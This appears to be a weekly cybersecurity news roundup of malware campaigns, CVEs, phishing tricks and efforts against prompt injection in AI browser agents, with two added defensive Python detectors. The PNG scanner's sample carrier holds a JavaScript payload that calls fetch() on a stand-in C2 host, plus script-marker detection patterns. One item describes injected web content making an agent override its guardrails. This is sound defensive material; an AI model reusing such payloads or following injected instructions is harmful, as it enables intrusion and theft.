The year opened without a reset. The same pressure carried over, and in some places it tightened. Systems people assume are boring or stable are showing up in the wrong places. Attacks moved quietly, reused familiar paths, and kept working longer than anyone wants to admit.
This week's stories share one pattern. Nothing flashy. No single moment. Just steady abuse of trust — updates, extensions, logins, messages — the things people click without thinking. That's where damage starts now.
This recap pulls those signals together. Not to overwhelm, but to show where attention slipped and why it matters early in the year.
⚡ Threat of the Week
RondoDox Botnet Exploits React2Shell Flaw — A persistent nine-month-long campaign has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 84,916 instances that remain susceptible to the vulnerability as of January 4, 2026, out of which 66,200 instances are located in the U.S., followed by Germany (3,600), France (2,500), and India (1,290).
A New Framework for Identity Security in the AI Era
In 2026, the security landscape is littered with unmanaged threats, including AI tools, SaaS apps, devices, and identities. Join 1Password CPO Abe Ankumah and security analyst Francis Odum to hear how security and IT leaders are taking control – without slowing down the pace of innovation.
Join the webinar ➝
🔔 Top News
- Trust Wallet Chrome Extension Hack Traced to Shai-Hulud Supply Chain Attack — Trust Wallet revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. "Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key," the company said. "The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet's standard release process, which requires internal approval/manual review." The unknown threat actors are said to have registered a domain to exfiltrate users' wallet mnemonic phrases. Koi's analysis found that directly querying the server to which the data was exfiltrated returned the response "He who controls the spice controls the universe," a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. There is evidence to suggest that preparations for the hack were underway since at least December 8, 2025.
- DarkSpectre Linked to Massive Browser Extension Campaigns — A newly uncovered Chinese threat group, DarkSpectre, has been linked to one of the most widespread browser-extension malware operations discovered to date, compromising more than 8.8 million users of Chrome, Edge, Firefox, and Opera over the past seven years. DarkSpectre's structure differs from that of traditional cybercrime operations. The group has been found to run disparate but interconnected malware clusters, each with distinct goals. The ShadyPanda campaign, responsible for 5.6 million infections, focuses on long-term user surveillance and e-commerce affiliate fraud. The second campaign, GhostPoster, spreads via Firefox and Opera extensions that conceal malicious payloads in PNG images via steganography. After lying dormant for several days, the extensions extract and execute JavaScript hidden within images, enabling stealthy remote code execution. This campaign has affected over one million users and relies on domains like gmzdaily.com and mitarchive.info for payload delivery. The most recent discovery, The Zoom Stealer, exposes around 2.2 million users to corporate espionage. The discovery reveals a highly organized criminal organization that has devoted itself to steadily churning out legitimate-looking browser extensions that sneak in malicious code.
- U.S. Treasury Lifts Sanctions on 3 Individuals Connected to Intellexa — The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) removed three individuals linked to the Intellexa Consortium, the holding company behind a commercial spyware known as Predator, from the specially designated nationals list. They included Merom Harpaz, Andrea Nicola Constantino Hermes Gambazzi, and Sara Aleksandra Fayssal Hamou. In a statement shared with Reuters, the Treasury said the removal "was done as part of the normal administrative process in response to a petition request for reconsideration." The department added that the individuals had "demonstrated measures to separate themselves from the Intellexa Consortium."
- Silver Fox Strikes India with Tax Lures — The Chinese cybercrime group known as Silver Fox has turned its focus to India, using income tax-themed lures in phishing campaigns to distribute a modular remote access trojan called ValleyRAT (aka Winos 4.0). In the campaign, phishing emails containing decoy PDFs purported to be from India's Income Tax Department are used to deploy ValleyRAT, a variant of Gh0st RAT that implements a plugin-oriented architecture to extend its functionality in an ad hoc manner, thereby allowing its operators to deploy specialized capabilities to facilitate keylogging, credential harvesting, and defense evasion. The disclosure came as a link management panel associated with Silver Fox was identified as being used to keep track of the web pages used to deliver fake installers containing ValleyRAT and the number of clicks to download the installers. An analysis of the origin IP addresses that have clicked on the download links has revealed that at least 217 clicks originated from China, followed by the U.S. (39), Hong Kong (29), Taiwan (11), and Australia (7).
- Mustang Panda Uses Rootkit Driver to Deliver TONESHELL — The Chinese hacking group known as Mustang Panda (aka HoneyMyte) leveraged a previously undocumented kernel-mode rootkit driver to deliver a new variant of backdoor dubbed TONESHELL in a cyber attack detected in mid-2025 targeting an unspecified entity in Asia. The main objective of the driver is to inject a backdoor trojan into the system processes and provide protection for malicious files, user-mode processes, and registry keys. The final payload deployed as part of the attack is TONESHELL, an implant with reverse shell and downloader capabilities to fetch next-stage malware onto compromised hosts. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022. The command-and-control (C2) infrastructure used for TONESHELL is said to have been erected in September 2024, although there are indications that the campaign itself did not commence until February 2025.
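Image assets are the one part of an extension bundle that review tooling rarely inspects, which is what makes the GhostPoster technique described above (JavaScript concealed in PNG files, extracted and executed after a dormancy period) effective. The block below is an added example, not code from the DarkSpectre research or from any browser vendor: a PNG chunk walker that flags the structural oddities a carrier image often has, namely bytes appended after the IEND chunk, oversized ancillary chunks, CRC mismatches, and script-like text where an image would not carry it. The 4096-byte threshold, the script markers, the `daTa` chunk name and the sample image are all constructed for this example; the page does not state which embedding method GhostPoster used, so the checks are generic rather than a signature for that campaign.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Ancillary chunks larger than this are unusual for an extension icon (threshold assumed)
MAX_ANCILLARY_BYTES = 4096
# Crude markers of embedded JavaScript in an opaque blob (heuristic, assumed)
SCRIPT_MARKERS = (b"function", b"eval(", b"=>", b"document.", b"fetch(")


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_png(extra_chunks=(), trailer=b"") -> bytes:
    """Construct a minimal 1x1 RGB PNG as sample input for this example,
    optionally with extra chunks before IDAT and raw bytes after IEND."""
    # width, height, bit depth 8, colour type 2 (RGB), compression, filter, interlace
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")  # filter byte + one black RGB pixel
    body = _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        body += _chunk(ctype, data)
    body += _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    return PNG_SIG + body + trailer


def looks_like_script(blob: bytes) -> bool:
    """Heuristic: does this blob contain JavaScript-looking tokens?"""
    return any(marker in blob for marker in SCRIPT_MARKERS)


def scan_png(data: bytes) -> list:
    """Walk the chunk list and return human-readable findings.
    An empty list means nothing unusual was seen."""
    findings = []
    if not data.startswith(PNG_SIG):
        return ["missing PNG signature"]
    pos = len(PNG_SIG)
    saw_iend = False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        chunk = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(chunk) < length or len(crc_bytes) < 4:
            findings.append(f"truncated chunk {name}")
            break
        if struct.unpack(">I", crc_bytes)[0] != (zlib.crc32(ctype + chunk) & 0xFFFFFFFF):
            findings.append(f"CRC mismatch in chunk {name}")
        # Bit 5 of the first type byte (lowercase letter) marks an ancillary chunk,
        # which decoders ignore: the natural hiding place for foreign data.
        ancillary = bool(ctype[0] & 0x20)
        if ancillary and length > MAX_ANCILLARY_BYTES:
            findings.append(f"oversized ancillary chunk {name} ({length} bytes)")
        if ancillary and looks_like_script(chunk):
            findings.append(f"script-like content in chunk {name}")
        pos += 12 + length
        if ctype == b"IEND":
            saw_iend = True
            break
    if not saw_iend:
        findings.append("no IEND chunk")
    else:
        # Anything after IEND is invisible to every image decoder but fully readable
        # by code that opens the file as bytes.
        trailing = data[pos:]
        if trailing:
            kind = "script-like" if looks_like_script(trailing) else "opaque"
            findings.append(f"{len(trailing)} {kind} bytes after IEND")
    return findings


if __name__ == "__main__":
    clean = build_png()
    carrier = build_png(trailer=b"(function(){fetch('https://c2.example.invalid')})()")
    print("clean:", scan_png(clean))
    print("carrier:", scan_png(carrier))
```

Run over every `.png` in an unpacked extension directory, a non-empty result is a reason to look at the file by hand; the script-marker check is deliberately loose because packed or obfuscated payloads will not match it, and the trailing-data and oversized-chunk checks are the ones that catch those.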
🔥 Trending CVEs
Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week's most serious security flaws. Check them, fix what matters first, and stay protected.
This week's list includes — CVE-2025-13915 (IBM API Connect), CVE-2025-52691 (SmarterTools SmarterMail), CVE-2025-47411 (Apache StreamPipes), CVE-2025-48769 (Apache NuttX RTOS), CVE-2025-14346 (WHILL Model C2 Electric Wheelchairs and Model F Power Chairs), CVE-2025-52871, CVE-2025-53597 (QNAP), CVE-2025-59887, and CVE-2025-59888 (Eaton UPS Companion).
📰 Around the Cyber World
- 200 Security Incidents Target Crypto in 2025 — According to "incomplete statistics" from blockchain security firm SlowMist, 200 security breaches occurred last year, impacting the crypto community, resulting in losses of around $2.935 billion. "In comparison, 2024 saw 410 incidents with around $2.013 billion in losses," the company said. "While the number of incidents declined year-over-year, the total amount of losses increased by approximately 46%."
- PyPI Says 52% of Active Users Have 2FA Enabled — The Python Software Foundation said 52% of active PyPI users are now using two-factor authentication to secure their accounts, and that more than 50,000 projects are using trusted publishing. Some of the other notable security measures rolled out in the Python Package Index (PyPI) include warning users about untrusted domains, preventing attacks involving malicious ZIP files, flagging potential typosquatting attempts during project creation, periodically checking for expired domains to prevent domain resurrection attacks, and prohibiting registrations from specific domains that were a source of abuse.
- TikTok Takes Down Influence Network Targeting Hungary — TikTok said it took down a network of 95 accounts with 131,342 followers that operated from Hungary and targeted audiences in the country. "The individuals behind this network created inauthentic accounts in order to amplify narratives favorable to the Fidesz political party," the social media platform said. "The network was found to coordinate across multiple online platforms."
- Handala Team Breaches Telegram Account of Israeli Officials — The pro-Iranian group known as Handala broke into the Telegram accounts of two prominent Israeli political figures, including former Prime Minister Naftali Bennett and Tzachi Braverman, Netanyahu's Chief of Staff. "The most probable attack vectors include social engineering or spear phishing targeting passwords and OTPs, the exfiltration of Telegram Desktop session files (tdata) from compromised workstations, or unauthorized access to cloud backups," KELA said. "While the scope of the breach was likely exaggerated by Handala, the incident highlights the critical need for session management and MFA, even on 'secure' messaging apps." In late November 2025, the group also published a list of Israeli high-tech and aerospace professionals, misleadingly describing them as criminals.
- Flaws in Bluetooth Headphones Using Airoha Chips Detailed — More details have emerged about three vulnerabilities impacting Bluetooth headphones using Airoha chips: CVE-2025-20700, CVE-2025-20701, and CVE-2025-20702. The flaws impacted headphones from Sony, Marshall, JBL, and Beyerdynamic, and were patched back in June. The issues could be exploited by an attacker in physical proximity to silently connect to a pair of headphones via BLE or Classic Bluetooth, exfiltrate the flash memory of the headphones, and extract the Bluetooth Link Key. This, in turn, allows the attacker to impersonate a "Bluetooth" device, connect to a target's phone, and interact with it from the privileged position of a trusted peripheral, including even eavesdropping on conversations and extracting call history and stored contacts.
- Ransomware Turns Breaches into Bidding Wars — Ransomware's evolution from digital extortion into a "structured, profit-driven criminal enterprise" has paved the way for an ecosystem that not only attempts to ransom stolen data, but also monetizes for maximum profit by selling it to the highest bidder through data auctions. "By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations," Rapid7 said. "The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity."
- Teams Notifications Abused for Callback Phishing — Threat actors are abusing Microsoft Teams notifications for callback phishing attacks. "Victims are invited to groups where team names contain the scam content, such as fake invoices, auto-renewal notices, or PayPal payment claims, and are urged to call a fake support number if the charge was not authorized. Because these messages come from the official Microsoft Teams sender address (no-reply@teams.mail[.]microsoft), they may bypass user suspicion and email filters," Trustwave said.
- Teams Vishing Attack Leads to .NET Malware — In another campaign spotted by the security vendor, a vishing campaign originating from Teams has been found to trick unsuspecting users into installing Quick Assist software, ultimately leading to the deployment of a multi-stage .NET malware using an executable named updater.exe. "The victim receives a Teams call from an attacker impersonating Senior IT Staff," it said. "Attacker convinces user to launch Quick Assist. The 'updater.exe' is a .NET Core 8.0 wrapper with embedded 'loader.dll' that downloads encryption keys from jysync[.]info, retrieves encrypted payload, decrypts using AES-CBC + XOR, then loads assembly directly into memory for fileless execution via reflection."
- SEO Poisoning Distributes Oyster — A search engine optimization (SEO) poisoning campaign has continued to promote fake sites when users search for Microsoft Teams or Google Meet to distribute a backdoor called Oyster. This malware distribution threat has been active since at least November 2024. In July 2025, Arctic Wolf said it observed a similar wave of attacks that leveraged bogus sites hosting trojanized versions of legitimate tools like PuTTY and WinSCP to deliver the malware. Oyster is delivered via a loader component that's responsible for dropping the main component. The main payload then gathers system information, communicates with a C2 server, and provides the ability to remotely execute code.
- Fake SAP Concur Extensions Deliver FireClient Malware — A new campaign discovered by BlueVoyant is deceiving users into downloading fake SAP Concur browser extensions. The fake browser extension installer contains a loader designed to gather host information and send it to its C2 server. The loader subsequently extracts an embedded backdoor called FireClient that contains functionality to execute remote commands using the command console and PowerShell. It's assessed that the malware is distributed via malvertising, hijacking search queries for "Concur log in" on search engines like Bing. The starting point is an MSI installer that deploys a portable version of Firefox to the directory "LOCALAPPDATA\Programs\Firefox" in a deliberate effort to evade detection and avoid conflicts with existing Firefox installations. "After installation, the MSI file launches Firefox in headless mode, meaning the browser runs without a visible window, making its execution undetectable to the user," researchers Joshua Green and Thomas Elkins said. "Once Firefox is running, the user's default browser is opened and redirected to the legitimate Concur website. This tactic is intended to create the illusion that the extension installation was successful, thereby deceiving the user." In the background, the malware proceeds to overwrite configuration files located within Firefox profile directories to induce the browser to launch the loader DLL. BlueVoyant's analysis has uncovered tactical and infrastructural overlaps with GrayAlpha (aka FIN7), which was previously observed leveraging fake browser update websites as part of its operations. "The FireClient malware likely represents a sophisticated component of GrayAlpha's evolving toolkit, deployed within a multi-pronged campaign leveraging a variety of trusted software lures," the company said.
- OpenAI Says Prompt Injections May Never Go Away in Browser Agents — OpenAI disclosed that it shipped a security update to its ChatGPT Atlas browser with a newly adversarially trained model and strengthened surrounding safeguards to better combat prompt injections, which make it possible to conceal malicious instructions within online content and cause the artificial intelligence (AI) agent to override its guardrails. The company conceded that "agent mode" in ChatGPT Atlas broadens the security threat surface. "This update was prompted by a new class of prompt-injection attacks uncovered through our internal automated red teaming," it said. The AI company said it built an LLM-based automated attacker and trained it with reinforcement learning to look for prompt injections that can successfully attack a browser agent. "Prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully 'solved,'" it added. "But we're optimistic that a proactive, highly responsive rapid response loop can continue to materially reduce real-world risk over time. By combining automated attack discovery with adversarial training and system-level safeguards, we can identify new attack patterns earlier, close gaps faster, and continuously raise the cost of exploitation." The changes are in line with similar approaches undertaken by Anthropic and Google to fight the persistent risk of prompt-based attacks. The development comes as Microsoft revealed that adversaries have begun implementing AI across a range of malicious activities, including automated vulnerability discovery or phishing campaigns, malware or deepfake generation, data analysis, influence operations, and crafting convincing fraudulent messages. "AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts – a 4.5x increase," it said. "AI enables more targeted phishing and better phishing lures."
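The Teams callback-phishing item above makes a point that defeats sender-based filtering: the notification really does come from Microsoft, so the only thing left to score is the content, and the scam text sits in the team name rather than the body. The block below is an added example, not Trustwave's detection logic, that triages a batch of Teams invitation notifications on content alone. The lure and urgency vocabularies, the weights, the threshold of 4 and the four sample notifications are all constructed for this example; the sender address is the one quoted on the page and is deliberately not used as a signal.

```python
import re
from dataclasses import dataclass

# Official notification sender quoted in the Trustwave report (defanged on the page).
# It is genuine, so sender reputation cannot separate these from legitimate invites.
TEAMS_SENDER = "no-reply@teams.mail.microsoft"

# Heuristic vocabularies and patterns (assumed for this example)
LURE_TERMS = ("invoice", "auto-renew", "renewal", "paypal", "payment", "charge",
              "subscription", "refund")
URGENCY_TERMS = ("call", "dial", "contact", "not authorized", "unauthorized", "cancel")
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
AMOUNT_RE = re.compile(r"[$€£]\s?\d+(?:[.,]\d{2})?")


@dataclass
class TeamsNotification:
    sender: str
    team_name: str
    body: str


def score_notification(n: TeamsNotification) -> tuple:
    """Return (score, reasons). The team name is the key field: a real team is not
    normally named after a charge, an invoice or a phone number, so signals found
    there weigh more than the same signals in the body text."""
    score, reasons = 0, []
    name, body = n.team_name.lower(), n.body.lower()
    if PHONE_RE.search(n.team_name):
        score += 3
        reasons.append("phone number in team name")
    elif PHONE_RE.search(n.body):
        score += 1
        reasons.append("phone number in body")
    if any(t in name for t in LURE_TERMS):
        score += 2
        reasons.append("billing lure in team name")
    elif any(t in body for t in LURE_TERMS):
        score += 1
        reasons.append("billing lure in body")
    if any(t in name or t in body for t in URGENCY_TERMS):
        score += 1
        reasons.append("call-to-action or urgency wording")
    if AMOUNT_RE.search(n.team_name) or AMOUNT_RE.search(n.body):
        score += 1
        reasons.append("currency amount present")
    return score, reasons


def is_callback_phish(n: TeamsNotification, threshold: int = 4) -> bool:
    return score_notification(n)[0] >= threshold


# Constructed sample notifications (not real messages). The last one is a genuine
# finance team whose name contains a lure word, included to show it stays below threshold.
SAMPLES = [
    TeamsNotification(TEAMS_SENDER,
                      "PayPal: $499.99 charged - call 1-800-555-0199 if not authorized",
                      "Jordan invited you to join the team"),
    TeamsNotification(TEAMS_SENDER,
                      "Invoice #88213 auto-renewal notice",
                      "Call (555) 010-4477 to cancel this charge"),
    TeamsNotification(TEAMS_SENDER,
                      "Q1 Platform Migration",
                      "Alice added you to the team"),
    TeamsNotification(TEAMS_SENDER,
                      "Finance - Invoice Processing",
                      "Bob added you to the team"),
]


def triage(samples=SAMPLES) -> list:
    """Return (team_name, score, reasons, verdict) for each notification."""
    return [(n.team_name, *score_notification(n), is_callback_phish(n)) for n in samples]


if __name__ == "__main__":
    for team, score, reasons, verdict in triage():
        print(f"{'PHISH ' if verdict else 'ok    '} {score} {team!r} {reasons}")
```

The phone-number-in-team-name rule carries most of the weight on purpose: legitimate invitations almost never put a dial-back number in the team name, whereas every callback lure must, because the number is the payload.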
🎥 Cybersecurity Webinars
- Defeating "Living off the Land": Proactive Security for 2026 - To stay ahead of evolving threats, defenders must move beyond traditional file-based detection toward proactive, AI-powered visibility. This session reveals how to catch "living off the land" and fileless attacks that use legitimate system tools to bypass legacy security. You'll learn how to secure developer workflows and encrypted traffic using Zero Trust principles, ensuring that even the most stealthy, binary-less threats are neutralized before they reach your endpoints.
- How to Scale AI Agents Without Scaling Your Attack Surface - As developers use AI agents like Claude Code and Copilot to ship code at warp speed, they are unknowingly introducing new risks through unmanaged "MCP" servers and hidden API keys. This webinar explains how to secure these autonomous tools before they become backdoors for data theft or remote attacks. Join us to learn how to identify malicious tools in your environment and enforce the security policies needed to keep your organization fast but safe.
- Scaling Your MSSP: High-Margin CISO Services Powered by AI - In 2026, staying competitive as an MSSP requires moving beyond manual labor to AI-driven security management. This session explores how leading providers are using automation to slash workloads and deliver high-value CISO services without increasing headcount. By joining industry experts David Primor and Chad Robinson, you'll learn proven strategies to package tier-based offerings, boost profit margins, and empower your existing team to deliver expert-level results at scale.
🔧 Cybersecurity Tools
- rnsec - It is a lightweight command-line security scanner for React Native and Expo apps. It runs with no configuration, analyzes the code statically, and flags common security issues such as hardcoded secrets, insecure storage, weak crypto, and unsafe network usage. Results are delivered as a simple HTML or JSON report, making it easy to review locally or plug into CI pipelines.
- Duplicati - It is a free, open-source backup tool that encrypts your data before sending it to cloud storage or remote servers. It supports incremental and compressed backups, runs on Windows, macOS, and Linux, and works with many providers like S3, Google Drive, OneDrive, and SFTP. Backups can be scheduled automatically and managed through a simple web interface or the command line.
Disclaimer: These tools are for learning and research only. They haven't been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.
Conclusion
What matters is not any single incident, but what they show together. The same weaknesses keep getting tested from different angles. When something works once, it gets reused, copied, and scaled. That pattern is clear before the details even matter.
Use this recap as a check, not a warning. If these issues feel familiar, that's the point. Familiar problems are the ones most likely to be missed again.